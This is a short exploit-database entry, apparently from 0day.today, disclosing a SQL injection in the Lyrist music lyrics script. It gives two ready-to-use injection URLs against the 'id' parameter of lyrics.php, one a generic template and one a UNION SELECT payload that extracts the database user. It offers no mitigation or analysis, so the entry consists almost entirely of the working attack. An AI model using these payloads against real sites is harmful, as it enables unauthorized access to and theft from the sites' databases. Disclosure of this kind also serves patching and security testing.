id: 30490
date: 05/29/2018
title: Lyrist - id SQL Injection Vulnerability
author: Meisam Monsef
cves: 

# Exploit Title: Lyrist - Music Lyrics Script - SQL Injection
# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce
# Vendor Homepage: https://www.codester.com/items/7250/lyrist-music-lyrics-script
# Version: All Version
 
 
Exploit :
http://site.com/lyrics.php?id=-9999%27+[SQL+Command]+%23
http://site.com/lyrics.php?id=-9999%27+union+select+1,2,3,user(),5,6,7,8,9,10,11+%23

#  0day.today [2023-03-25]  #